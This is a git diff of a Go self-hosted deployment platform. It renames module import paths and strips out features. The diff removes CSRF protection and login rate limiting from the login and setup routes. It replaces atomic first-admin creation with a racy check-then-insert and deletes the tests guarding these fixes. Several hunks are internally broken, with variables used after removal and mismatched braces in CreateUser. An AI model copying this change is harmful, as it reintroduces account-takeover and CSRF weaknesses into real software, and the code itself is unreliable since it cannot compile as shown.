 	DeploymentStatusDeploying DeploymentStatus = "deploying"
 	DeploymentStatusSuccess   DeploymentStatus = "success"
 	DeploymentStatusFailed    DeploymentStatus = "failed"
 	DeploymentStatusCancelled DeploymentStatus = "cancelled"
 )
 // Display constants.
@@ -77,11 +75,7 @@ func (d *Deployment) Reload(ctx context.Context) error {
 	return d.scan(row)
 }
 // maxLogSize is the maximum size of deployment logs stored in the database (1MB).
 const maxLogSize = 1 << 20
 // AppendLog appends a log line to the deployment logs.
 // If the total log size exceeds maxLogSize, the oldest lines are truncated.
 func (d *Deployment) AppendLog(ctx context.Context, line string) error {
 	var currentLogs string
@@ -89,22 +83,7 @@ func (d *Deployment) AppendLog(ctx context.Context, line string) error {
 		currentLogs = d.Logs.String
 	}
-	newLogs := currentLogs + line + "\n"
+	d.Logs = sql.NullString{String: currentLogs + line + "\n", Valid: true}
 	if len(newLogs) > maxLogSize {
 		// Keep the most recent logs that fit within the limit.
 		// Find a newline after the truncation point to avoid partial lines.
 		truncateAt := len(newLogs) - maxLogSize
 		idx := strings.Index(newLogs[truncateAt:], "\n")
 		if idx >= 0 {
 			newLogs = "[earlier logs truncated]\n" + newLogs[truncateAt+idx+1:]
 		} else {
 			newLogs = "[earlier logs truncated]\n" + newLogs[truncateAt:]
 		}
 	}
 	d.Logs = sql.NullString{String: newLogs, Valid: true}
 	return d.Save(ctx)
 }
--- a/internal/models/env_var.go
+++ b/internal/models/env_var.go
@@ -7,7 +7,7 @@ import (
 	"errors"
 	"fmt"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
 )
 // EnvVar represents an environment variable for an app.
--- a/internal/models/label.go
+++ b/internal/models/label.go
@@ -7,7 +7,7 @@ import (
 	"errors"
 	"fmt"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
 )
 // Label represents a Docker label for an app container.
--- a/internal/models/models_test.go
+++ b/internal/models/models_test.go
@@ -10,11 +10,11 @@ import (
 	"github.com/stretchr/testify/require"
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/config"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
-	"sneak.berlin/go/upaas/internal/globals"
+	"git.eeqj.de/sneak/upaas/internal/globals"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
-	"sneak.berlin/go/upaas/internal/models"
+	"git.eeqj.de/sneak/upaas/internal/models"
 )
 // Test constants to satisfy goconst linter.
@@ -297,7 +297,6 @@ func TestAllApps(t *testing.T) {
 			app.Branch = testBranch
 			app.DockerfilePath = "Dockerfile"
 			app.WebhookSecret = "secret-" + strconv.Itoa(idx)
 			app.WebhookSecretHash = database.HashWebhookSecret(app.WebhookSecret)
 			app.SSHPrivateKey = "private"
 			app.SSHPublicKey = "public"
@@ -792,7 +791,6 @@ func createTestApp(t *testing.T, testDB *database.Database) *models.App {
 	app.Branch = testBranch
 	app.DockerfilePath = "Dockerfile"
 	app.WebhookSecret = "secret-" + t.Name()
 	app.WebhookSecretHash = database.HashWebhookSecret(app.WebhookSecret)
 	app.SSHPrivateKey = "private"
 	app.SSHPublicKey = "public"
--- a/internal/models/port.go
+++ b/internal/models/port.go
@@ -6,7 +6,7 @@ import (
 	"errors"
 	"fmt"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
 )
 // PortProtocol represents the protocol for a port mapping.
--- a/internal/models/user.go
+++ b/internal/models/user.go
@@ -8,7 +8,7 @@ import (
 	"fmt"
 	"time"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
 )
 // User represents a user in the system.
@@ -135,61 +135,6 @@ func FindUserByUsername(
 	return user, nil
 }
 // CreateFirstUser atomically checks that no users exist and inserts the admin user.
 // Returns nil, nil if a user already exists (setup already completed).
 func CreateFirstUser(
 	ctx context.Context,
 	db *database.Database,
 	username, passwordHash string,
 ) (*User, error) {
 	tx, err := db.BeginTx(ctx, nil)
 	if err != nil {
 		return nil, fmt.Errorf("beginning transaction: %w", err)
 	}
 	defer func() { _ = tx.Rollback() }()
 	// Check if any user exists within the transaction.
 	var count int
 	err = tx.QueryRowContext(ctx, "SELECT COUNT(*) FROM users").Scan(&count)
 	if err != nil {
 		return nil, fmt.Errorf("checking user count: %w", err)
 	}
 	if count > 0 {
 		return nil, nil //nolint:nilnil // nil,nil signals setup already completed
 	}
 	result, err := tx.ExecContext(ctx,
 		"INSERT INTO users (username, password_hash) VALUES (?, ?)",
 		username, passwordHash,
 	)
 	if err != nil {
 		return nil, fmt.Errorf("inserting user: %w", err)
 	}
 	err = tx.Commit()
 	if err != nil {
 		return nil, fmt.Errorf("committing transaction: %w", err)
 	}
 	insertID, err := result.LastInsertId()
 	if err != nil {
 		return nil, fmt.Errorf("getting last insert id: %w", err)
 	}
 	user := NewUser(db)
 	user.ID = insertID
 	err = user.Reload(ctx)
 	if err != nil {
 		return nil, fmt.Errorf("reloading user: %w", err)
 	}
 	return user, nil
 }
 // UserExists checks if any user exists in the database.
 func UserExists(ctx context.Context, db *database.Database) (bool, error) {
 	var count int
--- a/internal/models/volume.go
+++ b/internal/models/volume.go
@@ -6,7 +6,7 @@ import (
 	"errors"
 	"fmt"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
 )
 // Volume represents a volume mount for an app container.
--- a/internal/models/webhook_event.go
+++ b/internal/models/webhook_event.go
@@ -7,7 +7,7 @@ import (
 	"fmt"
 	"time"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
 )
 // WebhookEvent represents a received webhook event.
@@ -52,20 +52,6 @@ func (w *WebhookEvent) Reload(ctx context.Context) error {
 	return w.scan(row)
 }
 // ShortCommit returns a truncated commit SHA for display.
 func (w *WebhookEvent) ShortCommit() string {
 	if !w.CommitSHA.Valid {
 		return ""
 	}
 	sha := w.CommitSHA.String
 	if len(sha) > shortCommitLength {
 		return sha[:shortCommitLength]
 	}
 	return sha
 }
 func (w *WebhookEvent) insert(ctx context.Context) error {
 	query := `
 		INSERT INTO webhook_events (
--- a/internal/server/routes.go
+++ b/internal/server/routes.go
@@ -8,7 +8,7 @@ import (
 	chimw "github.com/go-chi/chi/v5/middleware"
 	"github.com/prometheus/client_golang/prometheus/promhttp"
-	"sneak.berlin/go/upaas/static"
+	"git.eeqj.de/sneak/upaas/static"
 )
 // requestTimeout is the maximum duration for handling a request.
@@ -37,21 +37,17 @@ func (s *Server) SetupRoutes() {
 		http.FileServer(http.FS(static.Static)),
 	))
-	// Webhook endpoint (uses secret for auth, not session — no CSRF)
+	// Public routes
 	s.router.Get("/login", s.handlers.HandleLoginGET())
 	s.router.Post("/login", s.handlers.HandleLoginPOST())
 	s.router.Get("/setup", s.handlers.HandleSetupGET())
 	s.router.Post("/setup", s.handlers.HandleSetupPOST())
 	// Webhook endpoint (uses secret for auth, not session)
 	s.router.Post("/webhook/{secret}", s.handlers.HandleWebhook())
 	// All HTML-serving routes get CSRF protection
 	s.router.Group(func(r chi.Router) {
 		r.Use(s.mw.CSRF())
 		// Public routes
 		r.Get("/login", s.handlers.HandleLoginGET())
 		r.With(s.mw.LoginRateLimit()).Post("/login", s.handlers.HandleLoginPOST())
 		r.Get("/setup", s.handlers.HandleSetupGET())
 		r.Post("/setup", s.handlers.HandleSetupPOST())
 	// Protected routes (require session auth)
-		r.Group(func(r chi.Router) {
+	s.router.Group(func(r chi.Router) {
 		r.Use(s.mw.SessionAuth())
 		// Dashboard
@@ -68,57 +64,33 @@ func (s *Server) SetupRoutes() {
 		r.Post("/apps/{id}", s.handlers.HandleAppUpdate())
 		r.Post("/apps/{id}/delete", s.handlers.HandleAppDelete())
 		r.Post("/apps/{id}/deploy", s.handlers.HandleAppDeploy())
 			r.Post("/apps/{id}/deployments/cancel", s.handlers.HandleCancelDeploy())
 		r.Get("/apps/{id}/deployments", s.handlers.HandleAppDeployments())
 			r.Get("/apps/{id}/webhooks", s.handlers.HandleAppWebhookEvents())
 		r.Get("/apps/{id}/deployments/{deploymentID}/logs", s.handlers.HandleDeploymentLogsAPI())
 		r.Get("/apps/{id}/deployments/{deploymentID}/download", s.handlers.HandleDeploymentLogDownload())
 		r.Get("/apps/{id}/logs", s.handlers.HandleAppLogs())
 		r.Get("/apps/{id}/container-logs", s.handlers.HandleContainerLogsAPI())
 		r.Get("/apps/{id}/status", s.handlers.HandleAppStatusAPI())
 		r.Get("/apps/{id}/recent-deployments", s.handlers.HandleRecentDeploymentsAPI())
 			r.Post("/apps/{id}/rollback", s.handlers.HandleAppRollback())
 		r.Post("/apps/{id}/restart", s.handlers.HandleAppRestart())
 		r.Post("/apps/{id}/stop", s.handlers.HandleAppStop())
 		r.Post("/apps/{id}/start", s.handlers.HandleAppStart())
 		// Environment variables
 		r.Post("/apps/{id}/env-vars", s.handlers.HandleEnvVarAdd())
 			r.Post("/apps/{id}/env-vars/{varID}/edit", s.handlers.HandleEnvVarEdit())
 		r.Post("/apps/{id}/env-vars/{varID}/delete", s.handlers.HandleEnvVarDelete())
 		// Labels
 		r.Post("/apps/{id}/labels", s.handlers.HandleLabelAdd())
 			r.Post("/apps/{id}/labels/{labelID}/edit", s.handlers.HandleLabelEdit())
 		r.Post("/apps/{id}/labels/{labelID}/delete", s.handlers.HandleLabelDelete())
 		// Volumes
 		r.Post("/apps/{id}/volumes", s.handlers.HandleVolumeAdd())
 			r.Post("/apps/{id}/volumes/{volumeID}/edit", s.handlers.HandleVolumeEdit())
 		r.Post("/apps/{id}/volumes/{volumeID}/delete", s.handlers.HandleVolumeDelete())
 		// Ports
 		r.Post("/apps/{id}/ports", s.handlers.HandlePortAdd())
 		r.Post("/apps/{id}/ports/{portID}/delete", s.handlers.HandlePortDelete())
 	})
 	})
 	// API v1 routes (cookie-based session auth, no CSRF)
 	s.router.Route("/api/v1", func(r chi.Router) {
 		// Login endpoint is public (returns session cookie)
 		r.With(s.mw.LoginRateLimit()).Post("/login", s.handlers.HandleAPILoginPOST())
 		// All other API routes require session auth
 		r.Group(func(r chi.Router) {
 			r.Use(s.mw.APISessionAuth())
 			r.Get("/whoami", s.handlers.HandleAPIWhoAmI())
 			r.Get("/apps", s.handlers.HandleAPIListApps())
 			r.Get("/apps/{id}", s.handlers.HandleAPIGetApp())
 			r.Get("/apps/{id}/deployments", s.handlers.HandleAPIListDeployments())
 		})
 	})
 	// Metrics endpoint (optional, with basic auth)
 	if s.params.Config.MetricsUsername != "" {
--- a/internal/server/server.go
+++ b/internal/server/server.go
@@ -12,11 +12,11 @@ import (
 	"github.com/go-chi/chi/v5"
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/config"
-	"sneak.berlin/go/upaas/internal/globals"
+	"git.eeqj.de/sneak/upaas/internal/globals"
-	"sneak.berlin/go/upaas/internal/handlers"
+	"git.eeqj.de/sneak/upaas/internal/handlers"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
-	"sneak.berlin/go/upaas/internal/middleware"
+	"git.eeqj.de/sneak/upaas/internal/middleware"
 )
 // Params contains dependencies for Server.
--- a/internal/service/app/app.go
+++ b/internal/service/app/app.go
@@ -11,13 +11,12 @@ import (
 	"github.com/google/uuid"
 	"github.com/oklog/ulid/v2"
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
-	"sneak.berlin/go/upaas/internal/models"
+	"git.eeqj.de/sneak/upaas/internal/models"
-	"sneak.berlin/go/upaas/internal/ssh"
+	"git.eeqj.de/sneak/upaas/internal/ssh"
 )
 // ServiceParams contains dependencies for Service.
@@ -83,7 +82,6 @@ func (svc *Service) CreateApp(
 	}
 	app.WebhookSecret = uuid.New().String()
 	app.WebhookSecretHash = database.HashWebhookSecret(app.WebhookSecret)
 	app.SSHPrivateKey = keyPair.PrivateKey
 	app.SSHPublicKey = keyPair.PublicKey
 	app.Status = models.AppStatusPending
--- a/internal/service/app/app_test.go
+++ b/internal/service/app/app_test.go
@@ -8,12 +8,12 @@ import (
 	"github.com/stretchr/testify/require"
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/config"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
-	"sneak.berlin/go/upaas/internal/globals"
+	"git.eeqj.de/sneak/upaas/internal/globals"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
-	"sneak.berlin/go/upaas/internal/models"
+	"git.eeqj.de/sneak/upaas/internal/models"
-	"sneak.berlin/go/upaas/internal/service/app"
+	"git.eeqj.de/sneak/upaas/internal/service/app"
 )
 func setupTestService(t *testing.T) (*app.Service, func()) {
--- a/internal/service/auth/auth.go
+++ b/internal/service/auth/auth.go
@@ -10,15 +10,16 @@ import (
 	"log/slog"
 	"net/http"
 	"strings"
 	"time"
 	"github.com/gorilla/sessions"
 	"go.uber.org/fx"
 	"golang.org/x/crypto/argon2"
-	"sneak.berlin/go/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/config"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
-	"sneak.berlin/go/upaas/internal/models"
+	"git.eeqj.de/sneak/upaas/internal/models"
 )
 const (
@@ -72,7 +73,6 @@ func New(_ fx.Lifecycle, params ServiceParams) (*Service, error) {
 		Path:     "/",
 		MaxAge:   sessionMaxAgeSeconds,
 		HttpOnly: true,
 		Secure:   !params.Config.Debug,
 		SameSite: http.SameSiteLaxMode,
 	}
@@ -162,27 +162,34 @@ func (svc *Service) IsSetupRequired(ctx context.Context) (bool, error) {
 }
 // CreateUser creates the initial admin user.
 // It uses a DB transaction to atomically check that no users exist and insert
 // the new admin user, preventing race conditions from concurrent setup requests.
 func (svc *Service) CreateUser(
 	ctx context.Context,
 	username, password string,
 ) (*models.User, error) {
-	// Hash password before starting transaction.
+	// Check if user already exists
 	exists, err := models.UserExists(ctx, svc.db)
 	if err != nil {
 		return nil, fmt.Errorf("failed to check if user exists: %w", err)
 	}
 	if exists {
 		return nil, ErrUserExists
 	}
 	// Hash password
 	hash, err := svc.HashPassword(password)
 	if err != nil {
 		return nil, fmt.Errorf("failed to hash password: %w", err)
 	}
-	// Use a transaction so the "no users exist" check and the insert are atomic.
+	// Create user
-	// SQLite serializes write transactions, so concurrent requests will block here.
+	user := models.NewUser(svc.db)
-	user, err := models.CreateFirstUser(ctx, svc.db, username, hash)
+	user.Username = username
-	if err != nil {
+	user.PasswordHash = hash
 		return nil, fmt.Errorf("failed to create user: %w", err)
 	}
-	if user == nil {
+	err = user.Save(ctx)
-		return nil, ErrUserExists
+	if err != nil {
 		return nil, fmt.Errorf("failed to save user: %w", err)
 	}
 	svc.log.Info("user created", "username", username)
@@ -268,7 +275,7 @@ func (svc *Service) DestroySession(
 		return fmt.Errorf("failed to get session: %w", err)
 	}
-	session.Options.MaxAge = -1
+	session.Options.MaxAge = -1 * int(time.Second)
 	saveErr := session.Save(request, respWriter)
 	if saveErr != nil {
--- a/internal/service/auth/auth_test.go
+++ b/internal/service/auth/auth_test.go
@@ -2,9 +2,6 @@ package auth_test
 import (
 	"context"
 	"fmt"
 	"net/http"
 	"net/http/httptest"
 	"path/filepath"
 	"testing"
@@ -12,11 +9,11 @@ import (
 	"github.com/stretchr/testify/require"
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/config"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
-	"sneak.berlin/go/upaas/internal/globals"
+	"git.eeqj.de/sneak/upaas/internal/globals"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
-	"sneak.berlin/go/upaas/internal/service/auth"
+	"git.eeqj.de/sneak/upaas/internal/service/auth"
 )
 func setupTestService(t *testing.T) (*auth.Service, func()) {
@@ -71,83 +68,6 @@ func setupTestService(t *testing.T) (*auth.Service, func()) {
 	return svc, cleanup
 }
 func setupAuthService(t *testing.T, debug bool) *auth.Service {
 	t.Helper()
 	tmpDir := t.TempDir()
 	globals.SetAppname("upaas-test")
 	globals.SetVersion("test")
 	globalsInst, err := globals.New(fx.Lifecycle(nil))
 	require.NoError(t, err)
 	loggerInst, err := logger.New(
 		fx.Lifecycle(nil),
 		logger.Params{Globals: globalsInst},
 	)
 	require.NoError(t, err)
 	cfg := &config.Config{
 		Port:          8080,
 		DataDir:       tmpDir,
 		SessionSecret: "test-secret-key-at-least-32-chars",
 		Debug:         debug,
 	}
 	dbInst, err := database.New(fx.Lifecycle(nil), database.Params{
 		Logger: loggerInst,
 		Config: cfg,
 	})
 	require.NoError(t, err)
 	svc, err := auth.New(fx.Lifecycle(nil), auth.ServiceParams{
 		Logger:   loggerInst,
 		Config:   cfg,
 		Database: dbInst,
 	})
 	require.NoError(t, err)
 	return svc
 }
 func getSessionCookie(t *testing.T, svc *auth.Service) *http.Cookie {
 	t.Helper()
 	_, err := svc.CreateUser(context.Background(), "admin", "password123")
 	require.NoError(t, err)
 	user, err := svc.Authenticate(context.Background(), "admin", "password123")
 	require.NoError(t, err)
 	recorder := httptest.NewRecorder()
 	request := httptest.NewRequest(http.MethodGet, "/", nil)
 	err = svc.CreateSession(recorder, request, user)
 	require.NoError(t, err)
 	for _, c := range recorder.Result().Cookies() {
 		if c.Name == "upaas_session" {
 			return c
 		}
 	}
 	return nil
 }
 func TestSessionCookieSecureFlag(testingT *testing.T) {
 	testingT.Parallel()
 	testingT.Run("secure flag is true when debug is false", func(t *testing.T) {
 		t.Parallel()
 		svc := setupAuthService(t, false)
 		cookie := getSessionCookie(t, svc)
 		require.NotNil(t, cookie, "session cookie should exist")
 		assert.True(t, cookie.Secure, "session cookie should have Secure flag in production mode")
 	})
 }
 func TestHashPassword(testingT *testing.T) {
 	testingT.Parallel()
@@ -280,54 +200,6 @@ func TestCreateUser(testingT *testing.T) {
 	})
 }
 func TestCreateUserRaceCondition(testingT *testing.T) {
 	testingT.Parallel()
 	testingT.Run("concurrent setup requests create only one user", func(t *testing.T) {
 		t.Parallel()
 		svc, cleanup := setupTestService(t)
 		defer cleanup()
 		const goroutines = 10
 		results := make(chan error, goroutines)
 		start := make(chan struct{})
 		for i := range goroutines {
 			go func(idx int) {
 				<-start // Wait for all goroutines to be ready
 				_, err := svc.CreateUser(
 					context.Background(),
 					fmt.Sprintf("admin%d", idx),
 					"password123456",
 				)
 				results <- err
 			}(i)
 		}
 		// Release all goroutines simultaneously
 		close(start)
 		var successes, failures int
 		for range goroutines {
 			err := <-results
 			if err == nil {
 				successes++
 			} else {
 				require.ErrorIs(t, err, auth.ErrUserExists)
 				failures++
 			}
 		}
 		assert.Equal(t, 1, successes, "exactly one goroutine should succeed")
 		assert.Equal(t, goroutines-1, failures, "all other goroutines should fail with ErrUserExists")
 	})
 }
 func TestAuthenticate(testingT *testing.T) {
 	testingT.Parallel()
@@ -369,38 +241,3 @@ func TestAuthenticate(testingT *testing.T) {
 		assert.ErrorIs(t, err, auth.ErrInvalidCredentials)
 	})
 }
 func TestDestroySessionMaxAge(testingT *testing.T) {
 	testingT.Parallel()
 	testingT.Run("sets MaxAge to exactly -1", func(t *testing.T) {
 		t.Parallel()
 		svc, cleanup := setupTestService(t)
 		defer cleanup()
 		recorder := httptest.NewRecorder()
 		request := httptest.NewRequest(http.MethodGet, "/", nil)
 		err := svc.DestroySession(recorder, request)
 		require.NoError(t, err)
 		// Check the Set-Cookie header to verify MaxAge is -1 (immediate expiry).
 		// With MaxAge = -1, the cookie should have Max-Age=0 in the HTTP header
 		// (per http.Cookie semantics: negative MaxAge means delete now).
 		cookies := recorder.Result().Cookies()
 		require.NotEmpty(t, cookies, "expected a Set-Cookie header")
 		found := false
 		for _, c := range cookies {
 			if c.MaxAge < 0 {
 				found = true
 				break
 			}
 		}
 		assert.True(t, found, "expected a cookie with negative MaxAge (deletion)")
 	})
 }
--- a/internal/service/deploy/deploy.go
+++ b/internal/service/deploy/deploy.go
@@ -11,18 +11,17 @@ import (
 	"log/slog"
 	"os"
 	"path/filepath"
 	"strings"
 	"sync"
 	"time"
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/config"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
-	"sneak.berlin/go/upaas/internal/docker"
+	"git.eeqj.de/sneak/upaas/internal/docker"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
-	"sneak.berlin/go/upaas/internal/models"
+	"git.eeqj.de/sneak/upaas/internal/models"
-	"sneak.berlin/go/upaas/internal/service/notify"
+	"git.eeqj.de/sneak/upaas/internal/service/notify"
 )
 // Time constants.
@@ -44,14 +43,10 @@ var (
 	ErrContainerUnhealthy = errors.New("container unhealthy after 60 seconds")
 	// ErrDeploymentInProgress indicates another deployment is already running.
 	ErrDeploymentInProgress = errors.New("deployment already in progress for this app")
 	// ErrDeployCancelled indicates the deployment was cancelled by a newer deploy.
 	ErrDeployCancelled = errors.New("deployment cancelled by newer deploy")
 	// ErrBuildTimeout indicates the build phase exceeded the timeout.
 	ErrBuildTimeout = errors.New("build timeout exceeded")
 	// ErrDeployTimeout indicates the deploy phase exceeded the timeout.
 	ErrDeployTimeout = errors.New("deploy timeout exceeded")
 	// ErrNoPreviousImage indicates there is no previous image to rollback to.
 	ErrNoPreviousImage = errors.New("no previous image available for rollback")
 )
 // logFlushInterval is how often to flush buffered logs to the database.
@@ -83,7 +78,6 @@ type deploymentLogWriter struct {
 	lineBuffer bytes.Buffer // buffer for incomplete lines
 	mu         sync.Mutex
 	done       chan struct{}
 	flushed    sync.WaitGroup  // waits for flush goroutine to finish
 	flushCtx   context.Context //nolint:containedctx // needed for async flush goroutine
 }
@@ -93,8 +87,6 @@ func newDeploymentLogWriter(ctx context.Context, deployment *models.Deployment)
 		done:       make(chan struct{}),
 		flushCtx:   ctx,
 	}
 	w.flushed.Add(1)
 	go w.runFlushLoop()
 	return w
@@ -136,15 +128,12 @@ func (w *deploymentLogWriter) Write(p []byte) (int, error) {
 	return len(p), nil
 }
-// Close stops the flush loop, waits for the final flush to complete.
+// Close stops the flush loop and performs a final flush.
 func (w *deploymentLogWriter) Close() {
 	close(w.done)
 	w.flushed.Wait()
 }
 func (w *deploymentLogWriter) runFlushLoop() {
 	defer w.flushed.Done()
 	ticker := time.NewTicker(logFlushInterval)
 	defer ticker.Stop()
@@ -210,12 +199,6 @@ type ServiceParams struct {
 	Notify   *notify.Service
 }
 // activeDeploy tracks a running deployment so it can be cancelled.
 type activeDeploy struct {
 	cancel context.CancelFunc
 	done   chan struct{}
 }
 // Service provides deployment functionality.
 type Service struct {
 	log      *slog.Logger
@@ -224,7 +207,6 @@ type Service struct {
 	notify   *notify.Service
 	config   *config.Config
 	params   *ServiceParams
 	activeDeploys sync.Map // map[string]*activeDeploy - per-app active deployment tracking
 	appLocks sync.Map // map[string]*sync.Mutex - per-app deployment locks
 }
@@ -251,8 +233,8 @@ func New(lc fx.Lifecycle, params ServiceParams) (*Service, error) {
 }
 // GetBuildDir returns the build directory path for an app.
-func (svc *Service) GetBuildDir(appName string) string {
+func (svc *Service) GetBuildDir(appID string) string {
-	return filepath.Join(svc.config.DataDir, "builds", appName)
+	return filepath.Join(svc.config.DataDir, "builds", appID)
 }
 // GetLogFilePath returns the path to the log file for a deployment.
@@ -286,39 +268,12 @@ func (svc *Service) GetLogFilePath(app *models.App, deployment *models.Deploymen
 	return filepath.Join(svc.config.DataDir, "logs", hostname, app.Name, filename)
 }
-// HasActiveDeploy returns true if there is an active deployment for the given app.
+// Deploy deploys an app.
 func (svc *Service) HasActiveDeploy(appID string) bool {
 	_, ok := svc.activeDeploys.Load(appID)
 	return ok
 }
 // CancelDeploy cancels any in-progress deployment for the given app
 // and waits for it to finish before returning. Returns true if a deployment
 // was cancelled, false if there was nothing to cancel.
 func (svc *Service) CancelDeploy(appID string) bool {
 	if !svc.HasActiveDeploy(appID) {
 		return false
 	}
 	svc.cancelActiveDeploy(appID)
 	return true
 }
 // Deploy deploys an app. If cancelExisting is true (e.g. webhook-triggered),
 // any in-progress deploy for the same app will be cancelled before starting.
 // If cancelExisting is false and a deploy is in progress, ErrDeploymentInProgress is returned.
 func (svc *Service) Deploy(
 	ctx context.Context,
 	app *models.App,
 	webhookEventID *int64,
 	cancelExisting bool,
 ) error {
 	if cancelExisting {
 		svc.cancelActiveDeploy(app.ID)
 	}
 	// Try to acquire per-app deployment lock
 	if !svc.tryLockApp(app.ID) {
 		svc.log.Warn("deployment already in progress", "app", app.Name)
@@ -327,184 +282,45 @@ func (svc *Service) Deploy(
 	}
 	defer svc.unlockApp(app.ID)
 	// Set up cancellable context and register as active deploy
 	deployCtx, cancel := context.WithCancel(ctx)
 	done := make(chan struct{})
 	ad := &activeDeploy{cancel: cancel, done: done}
 	svc.activeDeploys.Store(app.ID, ad)
 	defer func() {
 		cancel()
 		close(done)
 		svc.activeDeploys.Delete(app.ID)
 	}()
 	// Fetch webhook event and create deployment record
-	webhookEvent := svc.fetchWebhookEvent(deployCtx, webhookEventID)
+	webhookEvent := svc.fetchWebhookEvent(ctx, webhookEventID)
-	// Use a background context for DB operations that must complete regardless of cancellation
+	deployment, err := svc.createDeploymentRecord(ctx, app, webhookEventID, webhookEvent)
 	bgCtx := context.WithoutCancel(deployCtx)
 	deployment, err := svc.createDeploymentRecord(bgCtx, app, webhookEventID, webhookEvent)
 	if err != nil {
 		return err
 	}
-	svc.logWebhookPayload(bgCtx, deployment, webhookEvent)
+	svc.logWebhookPayload(ctx, deployment, webhookEvent)
-	err = svc.updateAppStatusBuilding(bgCtx, app)
+	err = svc.updateAppStatusBuilding(ctx, app)
 	if err != nil {
 		return err
 	}
-	svc.notify.NotifyBuildStart(bgCtx, app, deployment)
+	svc.notify.NotifyBuildStart(ctx, app, deployment)
 	return svc.runBuildAndDeploy(deployCtx, bgCtx, app, deployment)
 }
 // Rollback rolls back an app to its previous image.
 // It stops the current container, starts a new one with the previous image,
 // and creates a deployment record for the rollback.
 func (svc *Service) Rollback(ctx context.Context, app *models.App) error {
 	if !app.PreviousImageID.Valid || app.PreviousImageID.String == "" {
 		return ErrNoPreviousImage
 	}
 	// Acquire per-app deployment lock
 	if !svc.tryLockApp(app.ID) {
 		return ErrDeploymentInProgress
 	}
 	defer svc.unlockApp(app.ID)
 	bgCtx := context.WithoutCancel(ctx)
 	deployment, err := svc.createRollbackDeployment(bgCtx, app)
 	if err != nil {
 		return err
 	}
 	return svc.executeRollback(ctx, bgCtx, app, deployment)
 }
 // createRollbackDeployment creates a deployment record for a rollback operation.
 func (svc *Service) createRollbackDeployment(
 	ctx context.Context,
 	app *models.App,
 ) (*models.Deployment, error) {
 	deployment := models.NewDeployment(svc.db)
 	deployment.AppID = app.ID
 	deployment.Status = models.DeploymentStatusDeploying
 	deployment.ImageID = sql.NullString{String: app.PreviousImageID.String, Valid: true}
 	saveErr := deployment.Save(ctx)
 	if saveErr != nil {
 		return nil, fmt.Errorf("failed to create rollback deployment: %w", saveErr)
 	}
 	_ = deployment.AppendLog(ctx, "Rolling back to previous image: "+app.PreviousImageID.String)
 	return deployment, nil
 }
 // executeRollback performs the container swap for a rollback.
 func (svc *Service) executeRollback(
 	ctx context.Context,
 	bgCtx context.Context,
 	app *models.App,
 	deployment *models.Deployment,
 ) error {
 	previousImageID := app.PreviousImageID.String
 	svc.removeOldContainer(ctx, app, deployment)
 	rollbackOpts, err := svc.buildContainerOptions(ctx, app, docker.ImageID(previousImageID))
 	if err != nil {
 		svc.failDeployment(bgCtx, app, deployment, err)
 		return fmt.Errorf("failed to build container options: %w", err)
 	}
 	containerID, err := svc.docker.CreateContainer(ctx, rollbackOpts)
 	if err != nil {
 		svc.failDeployment(bgCtx, app, deployment, fmt.Errorf("failed to create rollback container: %w", err))
 		return fmt.Errorf("failed to create rollback container: %w", err)
 	}
 	deployment.ContainerID = sql.NullString{String: containerID.String(), Valid: true}
 	_ = deployment.AppendLog(bgCtx, "Rollback container created: "+containerID.String())
 	startErr := svc.docker.StartContainer(ctx, containerID)
 	if startErr != nil {
 		svc.failDeployment(bgCtx, app, deployment, fmt.Errorf("failed to start rollback container: %w", startErr))
 		return fmt.Errorf("failed to start rollback container: %w", startErr)
 	}
 	_ = deployment.AppendLog(bgCtx, "Rollback container started")
 	currentImageID := app.ImageID
 	app.ImageID = sql.NullString{String: previousImageID, Valid: true}
 	app.PreviousImageID = currentImageID
 	app.Status = models.AppStatusRunning
 	saveErr := app.Save(bgCtx)
 	if saveErr != nil {
 		return fmt.Errorf("failed to update app after rollback: %w", saveErr)
 	}
 	_ = deployment.MarkFinished(bgCtx, models.DeploymentStatusSuccess)
 	_ = deployment.AppendLog(bgCtx, "Rollback complete")
 	svc.log.Info("rollback completed", "app", app.Name, "image", previousImageID)
 	return nil
 }
 // runBuildAndDeploy executes the build and deploy phases, handling cancellation.
 func (svc *Service) runBuildAndDeploy(
 	deployCtx context.Context,
